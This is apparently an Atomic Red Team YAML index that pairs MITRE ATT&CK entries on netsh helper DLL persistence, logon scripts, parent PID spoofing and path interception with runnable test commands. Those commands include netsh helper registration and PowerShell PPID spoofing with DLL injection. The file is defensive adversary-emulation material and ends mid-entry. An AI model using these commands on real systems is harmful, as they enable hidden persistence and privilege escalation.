- id: attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-02-18T18:03:37.481Z' - created: '2020-02-18T18:03:37.481Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - x_mitre_detection: |- - If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) - - If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. - - Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.007: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.007 - url: https://attack.mitre.org/techniques/T1546/007 - - url: https://technet.microsoft.com/library/bb490939.aspx - description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. 
- source_name: TechNet Netsh - - url: https://github.com/outflankbv/NetshHelperBeacon - description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved - February 13, 2017. - source_name: Github Netsh Helper CS Beacon - - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html - description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL - DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. - source_name: Demaske Netsh Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Netsh Helper DLL - description: |- - Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. - - Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. 
(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) - id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T18:28:07.793Z' - created: '2020-01-24T14:26:51.207Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes - in most environments. Monitor process executions and investigate any child - processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh - registry key for any new or suspicious entries that do not correlate with - known system files or benign software. (Citation: Demaske Netsh Persistence)' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - - DLL monitoring - x_mitre_contributors: - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1546.007 - atomic_tests: - - name: Netsh Helper DLL Registration - auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files - -' - supported_platforms: - - windows - input_arguments: - helper_file: - description: Path to DLL - type: Path - default: C:\Path\file.dll - executor: - command: 'netsh.exe add helper #{helper_file} - -' - name: command_prompt - T1037.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.003 - url: https://attack.mitre.org/techniques/T1037/003 - - source_name: Petri Logon Script AD - url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 - description: Daniel Petri. (2009, January 8). 
Setting up a Logon Script through - Active Directory Users and Computers in Windows Server 2008. Retrieved November - 15, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Network Logon Script - description: "Adversaries may use network logon scripts automatically executed - at logon initialization to establish persistence. Network logon scripts can - be assigned using Active Directory or Group Policy Objects.(Citation: Petri - Logon Script AD) These logon scripts run with the privileges of the user they - are assigned to. Depending on the systems within the network, initializing - one of these scripts could apply to more than one or potentially all systems. - \ \n \nAdversaries may use these scripts to maintain persistence on a network. - Depending on the access configuration of the logon scripts, either local credentials - or an administrator account may be necessary." - id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:25.625Z' - created: '2020-01-10T18:01:03.666Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. 
- x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1134.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.004 - url: https://attack.mitre.org/techniques/T1134/004 - - source_name: DidierStevens SelectMyParent Nov 2009 - url: https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ - description: 'Stevens, D. (2009, November 22). Quickpost: SelectMyParent or - Playing With the Windows Process Tree. Retrieved June 3, 2019.' - - source_name: Microsoft UAC Nov 2018 - url: https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works - description: Montemayor, D. et al.. (2018, November 15). How User Account - Control works. Retrieved June 3, 2019. - - source_name: CounterCept PPID Spoofing Dec 2018 - url: https://www.countercept.com/blog/detecting-parent-pid-spoofing/ - description: Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved - June 3, 2019. - - source_name: CTD PPID Spoofing Macro Mar 2019 - url: https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ - description: Tafani-Dereeper, C. (2019, March 12). Building an Office macro - to spoof parent processes and command line arguments. Retrieved June 3, - 2019. - - source_name: XPNSec PPID Nov 2017 - url: https://blog.xpnsec.com/becoming-system/ - description: Chester, A. (2017, November 20). Alternative methods of becoming - SYSTEM. Retrieved June 4, 2019. - - source_name: Microsoft Process Creation Flags May 2018 - url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags - description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. - Retrieved June 4, 2019. - - description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) - Ataware Ransomware Part 3. Retrieved June 6, 2019. 
- url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 - source_name: Secuirtyinbits Ataware3 May 2019 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Parent PID Spoofing - description: |- - Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) - - Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) - - Explicitly assigning the PPID may also enable 
elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) - id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.030Z' - created: '2020-02-18T18:22:41.448Z' - x_mitre_contributors: - - Wayne Silva, F-Secure Countercept - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_defense_bypassed: - - Heuristic Detection - - Host forensic analysis - x_mitre_detection: |- - Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018) - - Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). 
Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible. - x_mitre_data_sources: - - API monitoring - - Process monitoring - - Windows event logs - x_mitre_platforms: - - Windows - identifier: T1134.004 - atomic_tests: - - name: Parent PID Spoofing using PowerShell - auto_generated_guid: '069258f4-2162-46e9-9a25-c9c6c56150d2' - description: | - This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. - Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and - calc.exe will be launched. - - Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) - supported_platforms: - - windows - input_arguments: - parent_process_name: - description: Name of the parent process - type: string - default: explorer - spawnto_process_path: - description: Path of the process to spawn - type: path - default: C:\Program Files\Internet Explorer\iexplore.exe - dll_process_name: - description: Name of the created process from the injected dll - type: string - default: calculator - dll_path: - description: Path of the dll to inject - type: path - default: PathToAtomicsFolder\T1134.004\bin\calc.dll - spawnto_process_name: - description: Name of the process to spawn - type: string - default: iexplore - dependency_executor_name: powershell - dependencies: - - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - -' - prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null - 
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" - executor: - command: | - . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 - $ppid=Get-Process #{parent_process_name} | select -expand id - PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}" - cleanup_command: | - Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore - Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - name: powershell - - name: Parent PID Spoofing - Spawn from Current Process - auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 - description: Spawns a powershell.exe process as a child of the current process. - supported_platforms: - - windows - input_arguments: - file_path: - description: File path or name of process to spawn - type: path - default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" - parent_pid: - description: PID of process to spawn from - type: string - default: "$PID" - command_line: - description: Specified command line to use - type: string - default: "-Command Start-Sleep 10" - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. - prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine - ''#{command_line}'' -ParentId #{parent_pid}' - name: powershell - - name: Parent PID Spoofing - Spawn from Specified Process - auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb - description: Spawns a notepad.exe process as a child of the current process. 
- supported_platforms: - - windows - input_arguments: - parent_pid: - description: PID of process to spawn from - type: string - default: "$PID" - test_guid: - description: Defined test GUID - type: string - default: 12345678-1234-1234-1234-123456789123 - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. - prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid - #{test_guid}' - name: powershell - - name: Parent PID Spoofing - Spawn from svchost.exe - auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 - description: Spawnd a process as a child of the first accessible svchost.exe - process. - supported_platforms: - - windows - input_arguments: - command_line: - description: Specified command line to use - type: string - default: "-Command Start-Sleep 10" - file_path: - description: File path or name of process to spawn - type: path - default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. 
- prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, - ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | - Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} - -CommandLine ''#{command_line}''' - name: powershell - - name: Parent PID Spoofing - Spawn from New Process - auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db - description: Creates a notepad.exe process and then spawns a powershell.exe - process as a child of it. - supported_platforms: - - windows - input_arguments: - command_line: - description: Specified command line to use - type: string - default: "-Command Start-Sleep 10" - file_path: - description: File path or name of process to spawn - type: path - default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" - parent_name: - description: Parent process to spoof from - type: path - default: "$Env:windir\\System32\\notepad.exe" - dependencies: - - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent - must be exported in the module. 
- prereq_command: |- - $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable - if (-not $RequiredModule) {exit 1} - if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} - get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser - -Force - -' - executor: - command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent - -FilePath #{file_path} -CommandLine ''#{command_line}''' - name: powershell - T1034: - technique: - id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception - description: |- - **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** - - Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) - - There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. 
- - ### Unquoted Paths - Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) - - ### PATH Environment Variable Misconfiguration - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - - ### Search Order Hijacking - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. 
(Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). - external_references: - - source_name: mitre-attack - external_id: T1034 - url: https://attack.mitre.org/techniques/T1034 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ - description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking - via .cmd or .bat file. Retrieved July 25, 2016. - source_name: TechNet MS14-019 - - url: http://support.microsoft.com/KB/103000 - description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. - Retrieved November 30, 2014. 
- source_name: Microsoft Subkey - - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Baggett, M. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved December 4, 2014. - source_name: Baggett 2012 - - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - source_name: SecurityBoulevard Unquoted Services APR 2018 - - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: McFarland, R. (2018, January 26). Windows Privilege Escalation - Guide. Retrieved August 10, 2018. - source_name: SploitSpren Windows Priv Jan 2018 - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 - description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December - 5, 2014. - source_name: Hill NT Shell - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx - description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. 
- source_name: MSDN Environment Property - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-07-06T18:49:35.645Z' - created: '2017-05-31T21:30:36.140Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_effective_permissions: - - User - - Administrator - - SYSTEM - x_mitre_detection: "Monitor file creation for files named after partial directories - and in locations that may be searched for common processes through the environment - variable, or otherwise should not be user writable. Monitor the executing - process for process executable paths that are named for partial directories. - Monitor file creation for programs that are named after Windows system programs - or programs commonly executed without a path (such as \"findstr,\" \"net,\" - and \"python\"). If this activity occurs outside of known administration activity, - upgrades, installations, or patches, then it may be suspicious. \n\nData and - events should not be viewed in isolation, but as part of a chain of behavior - that could lead to other activities, such as network connections made for - Command and Control, learning details about the environment through Discovery, - and Lateral Movement." 
- x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '1.0' - x_mitre_deprecated: true - atomic_tests: [] - T1574.007: - technique: - created: '2020-03-13T14:10:43.424Z' - modified: '2020-09-16T16:56:34.583Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by PATH Environment Variable - description: |- - Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. - - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. 
If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
- x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.008: - technique: - id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. - - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. 
(Citation: Microsoft Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - name: Path Interception by Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.008 - url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - source_name: Windows NT Command Shell - url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 - description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved - December 5, 2014. - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - source_name: Microsoft Environment Property - url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - description: Microsoft. (2011, October 24). Environment Property. Retrieved - July 27, 2016. 
- type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:03:35.217Z' - created: '2020-03-13T17:48:58.999Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: | - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
- x_mitre_permissions_required: - - Administrator - - User - - SYSTEM - x_mitre_effective_permissions: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1574.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.009 - url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - - source_name: Microsoft CurrentControlSet Services - url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services - Registry Tree. Retrieved March 16, 2020. - - source_name: Help eliminate unquoted path - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Mark Baggett. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved November 8, 2012. - - source_name: Windows Unquoted Services - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - - source_name: Windows Privilege Escalation Guide - url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. - Retrieved August 10, 2018. - object_marking_refs: - - 